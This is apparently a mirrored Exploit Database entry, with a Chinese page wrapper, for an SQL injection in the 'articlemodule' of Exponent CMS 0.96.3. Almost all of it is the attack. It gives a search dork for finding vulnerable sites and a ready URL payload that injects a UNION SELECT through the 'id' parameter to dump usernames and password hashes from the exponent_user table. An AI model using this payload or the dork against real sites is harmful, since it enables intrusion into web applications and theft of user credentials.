Exponent CMS 0.96.3 – ‘articlemodule’ SQL Injection

• Exploit Database
• 106 阅读

• 作者： T u R c O
  日期： 2010-02-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11349/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

  Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability ========================================================   #################################################################### # Author : T u R c O # Home : www.1923Turk.com # Script : exponentcms # Dork: "Welcome to Exponent CMS" | "my new exponent site"inurl:articlemodule     ####################################################################   ===[ Exploit ]===   http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION   -1+union+select+1,2,3,password,username,6+from+exponent_user--   Demo:   http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--   ####################################################################